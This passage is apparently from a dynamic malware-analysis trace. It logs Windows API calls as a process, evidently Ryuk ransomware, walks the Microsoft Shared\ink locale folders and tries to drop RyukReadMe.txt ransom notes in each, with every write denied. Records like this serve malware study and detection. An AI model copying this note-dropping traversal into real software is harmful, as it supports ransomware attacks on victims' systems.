0xffffffffffffffff [0161.340] GetLastError () returned 0x5 [0161.340] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.340] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.340] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.341] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.341] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.341] SetLastError (dwErrCode=0x0) [0161.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.341] GetLastError () returned 0x5 [0161.341] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.341] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.341] SetLastError (dwErrCode=0x0) [0161.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.341] GetLastError () returned 0x5 [0161.341] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.341] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.341] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.341] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.341] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.341] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.342] SetLastError (dwErrCode=0x0) [0161.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.342] GetLastError () returned 0x5 [0161.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.342] SetLastError (dwErrCode=0x0) [0161.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.342] GetLastError () returned 0x5 [0161.342] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.342] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.342] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.342] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.342] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.342] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.342] SetLastError (dwErrCode=0x0) [0161.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.343] GetLastError () returned 0x5 [0161.343] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.343] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.343] SetLastError (dwErrCode=0x0) [0161.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.343] GetLastError () returned 0x5 [0161.343] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.343] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.343] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.343] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.343] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.343] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.343] SetLastError (dwErrCode=0x0) [0161.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.343] GetLastError () returned 0x5 [0161.343] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.344] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.344] SetLastError (dwErrCode=0x0) [0161.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.344] GetLastError () returned 0x5 [0161.344] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.344] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.344] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.344] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.344] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.344] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.344] SetLastError (dwErrCode=0x0) [0161.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.344] GetLastError () returned 0x5 [0161.344] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.344] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.345] SetLastError (dwErrCode=0x0) [0161.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.345] GetLastError () returned 0x5 [0161.345] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.345] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.345] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.345] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.345] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.345] SetLastError (dwErrCode=0x0) [0161.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.345] GetLastError () returned 0x5 [0161.345] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.345] SetLastError (dwErrCode=0x0) [0161.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.346] GetLastError () returned 0x5 [0161.346] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.346] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.346] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.346] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.346] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.346] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.346] SetLastError (dwErrCode=0x0) [0161.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.346] GetLastError () returned 0x5 [0161.346] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.346] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.346] SetLastError (dwErrCode=0x0) [0161.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.347] GetLastError () returned 0x5 [0161.347] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.347] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.347] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.347] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.347] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.347] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.347] SetLastError (dwErrCode=0x0) [0161.347] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.347] GetLastError () returned 0x5 [0161.347] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.347] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.347] SetLastError (dwErrCode=0x0) [0161.347] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.348] GetLastError () returned 0x5 [0161.348] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.348] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.348] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.348] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.348] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.348] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.348] SetLastError (dwErrCode=0x0) [0161.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.348] GetLastError () returned 0x5 [0161.348] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.348] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.348] SetLastError (dwErrCode=0x0) [0161.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.348] GetLastError () returned 0x5 [0161.348] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.348] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.349] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.349] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.349] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.349] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.349] SetLastError (dwErrCode=0x0) [0161.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.349] GetLastError () returned 0x5 [0161.349] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.349] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.349] SetLastError (dwErrCode=0x0) [0161.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.349] GetLastError () returned 0x5 [0161.349] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.349] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.349] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.350] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.350] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.350] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.350] SetLastError (dwErrCode=0x0) [0161.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.350] GetLastError () returned 0x5 [0161.350] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.350] SetLastError (dwErrCode=0x0) [0161.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.350] GetLastError () returned 0x5 [0161.350] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.350] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.351] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.351] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.351] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.351] SetLastError (dwErrCode=0x0) [0161.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.351] GetLastError () returned 0x5 [0161.351] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.351] SetLastError (dwErrCode=0x0) [0161.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.351] GetLastError () returned 0x5 [0161.351] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.351] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.351] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.351] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.351] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.352] SetLastError (dwErrCode=0x0) [0161.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.352] GetLastError () returned 0x5 [0161.352] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.352] SetLastError (dwErrCode=0x0) [0161.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.352] GetLastError () returned 0x5 [0161.352] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, 